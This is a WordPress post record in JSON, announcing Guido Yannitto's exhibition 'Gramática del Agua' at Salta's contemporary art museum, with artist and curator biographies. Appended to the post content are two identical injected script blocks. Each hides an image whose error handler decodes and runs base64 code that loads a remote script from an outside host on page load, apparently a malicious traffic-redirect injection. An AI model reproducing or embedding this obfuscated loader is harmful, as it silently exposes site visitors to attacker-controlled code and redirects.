{"id":2325,"date":"2023-03-09T12:08:41","date_gmt":"2023-03-09T15:08:41","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2325"},"modified":"2025-08-14T00:21:38","modified_gmt":"2025-08-14T03:21:38","slug":"saltenxs-en-el-mac-este-viernes-inaugura-gramatica-del-agua-de-guido-yannitto","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2325","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/saltenixs-en-el-mac-este-viernes-inaugura-gramatica-del-agua-de-guido-yannitto-88327\">Salte\u00f1xs en el MAC: Este viernes inaugura \u201cGram\u00e1tica del Agua\u201d de Guido Yannitto<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#601b3f\"><em>Ma\u00f1ana a las 20 h, en el Museo de Arte Contempor\u00e1neo (Zuvir\u00eda 90), quedar\u00e1 inaugurada la muestra \u201cGram\u00e1tica del Agua\u201d de Guido Yannitto, en el marco del proyecto institucional Salte\u00f1xs en el Mac.<\/em><\/h4>\n\n\n\n<p>El Museo de Arte Contempor\u00e1neo presenta la VIII edici\u00f3n del proyecto institucional Salte\u00f1xs en el Mac, en esta oportunidad con Guido Yannitto como artista invitado, con su muestra Gram\u00e1tica del agua.<\/p>\n\n\n\n<p>En la muestra se podr\u00e1 apreciar instalaci\u00f3n, videos y textiles artesanales, con curadur\u00eda de Andrei Fern\u00e1ndez.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/88327-saltenixs-en-el-mac-este-viernes-inaugura-gramatica-del-agua-de-guido-yannitto-1.jpeg\" alt=\"\" class=\"wp-image-2326\" width=\"-139\" height=\"-184\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/88327-saltenixs-en-el-mac-este-viernes-inaugura-gramatica-del-agua-de-guido-yannitto-1.jpeg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/88327-saltenixs-en-el-mac-este-viernes-inaugura-gramatica-del-agua-de-guido-yannitto-1-227x300.jpeg 227w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/88327-saltenixs-en-el-mac-este-viernes-inaugura-gramatica-del-agua-de-guido-yannitto-1-318x420.jpeg 318w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure><\/div>\n\n\n<p>Esta propuesta, con la curadur\u00eda de Andre\u00ed Fernandez, permite conocer diferentes investigaciones est\u00e9ticas del artista, quien desde distintos medios experimenta desde hace dos d\u00e9cadas la creaci\u00f3n de im\u00e1genes con otras personas que trabajan oficios ancestrales en comunidades de tierras altas y bajas de la provincia de Salta.<\/p>\n\n\n\n<p>Su obra se desarrolla especialmente desde lenguajes textiles que abstraen narrativas de diferentes tiempos y or\u00edgenes. En los \u00faltimos a\u00f1os sus trabajos indagan posibles presentaciones del agua.<\/p>\n\n\n\n<p>Guido estudi\u00f3 artes en la Universidad Nacional de C\u00f3rdoba. Entre 2003 y 2005 recibi\u00f3 la beca formaci\u00f3n de la Fundaci\u00f3n Antorchas para j\u00f3venes artistas de la regi\u00f3n para ir una vez al mes a Salta (lugar donde creci\u00f3). Desde el 2005 al 2007 vivi\u00f3 en M\u00e9xico DF donde sigui\u00f3 su trabajo y formaci\u00f3n. &nbsp;En 2009 ingres\u00f3 al programa para artistas de la Universidad Torcuato Di Tella (Buenos Aires), bajo la tutor\u00eda de Jorge Macchi.<\/p>\n\n\n\n<p>En el mismo a\u00f1o gan\u00f3 una beca de producci\u00f3n otorgada por el Fondo Nacional de las Artes (Argentina). Desde 2008 forma parte de la NVA (Nuevo Video Argentino), emprendimiento que tiene por objetivo agrupar, promover y difundir las producciones de video en Argentina. En el 2012 realiz\u00f3 una residencia en la Ant\u00e1rtida y en el mismo a\u00f1o gan\u00f3 una beca de colaboraci\u00f3n M\u00e9xico (FONCA) y Argentina (Secretar\u00eda de Cultura de la Naci\u00f3n) para residir 3 meses en M\u00e9xico DF.<\/p>\n\n\n\n<p>En el 2013 gan\u00f3 el premio Lucio Fontana otorgado por el consulado general de Italia para residir dos meses en Torino (Italia). En el 2016 realiz\u00f3 el programa Escuela Flora en Flora Arts and nature, programa de residencia de 11 meses en la ciudad de Bogot\u00e1, Colombia. En el 2017 fue seleccionado para realizar la beca Van Eyck, Multiform institute for fine art, design and reflection, 12 meses en la ciudad de Maastricht, Holanda. Realiz\u00f3 posteriormente el programa Pivo Pesquisa en la ciudad de Sao Paulo, Brasil. Desde el a\u00f1o 2021 reside en la ciudad de Salta, donde trabaja como artista, docente y gestor. Ha fundado junto a Gonzalo Elias en el 2022 Remota Galer\u00eda, que obtuvo el Premio en Obra 2022 en la Feria<\/p>\n\n\n\n<p>ArteBA. Su obra forma parte de distintas colecciones entre las que se encuentran: Banco Itau, Museo Macro en Rosario, Museo Caraffa y Museo de Arte Contempor\u00e1neo de Salta, Argentina.<\/p>\n\n\n\n<p>Andrei Fern\u00e1ndez (Cutral- C\u00f3, 1983). Trabaja en -y desde- el norte argentino en proyectos en los que conviven investigaciones etnogr\u00e1ficas, nociones de econom\u00eda social y de arte contempor\u00e1neo. En su pr\u00e1ctica curatorial se sumerje en po\u00e9ticas de la naturaleza y de los conflictos, desde la escucha de testimonios de luchas territoriales\/vitales y el acompa\u00f1amiento a la creaci\u00f3n de im\u00e1genes que entran y salen del territorio del arte, para disputar valor y sentido en diferentes comunidades.<\/p>\n\n\n\n<p>Es Licenciada en Artes Pl\u00e1sticas por la Universidad Nacional de Tucum\u00e1n y estudi\u00f3 la Maestr\u00eda en Antropolog\u00eda Social y Pol\u00edtica en FLACSO. Vive en Salta.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/saltenixs-en-el-mac-este-viernes-inaugura-gramatica-del-agua-de-guido-yannitto-88327\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana a las 20 h, en el Museo de Arte Contempor\u00e1neo (Zuvir\u00eda 90), quedar\u00e1 inaugurada la muestra \u201cGram\u00e1tica del Agua\u201d de Guido Yannitto, en el marco del proyecto institucional Salte\u00f1xs en el Mac. El Museo de Arte Contempor\u00e1neo presenta la VIII edici\u00f3n del proyecto institucional Salte\u00f1xs en el Mac, en esta oportunidad con Guido Yannitto [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2327,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-2325","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2325"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2325"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2325\/revisions"}],"predecessor-version":[{"id":7152,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2325\/revisions\/7152"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2327"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2325"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2325"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2325"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}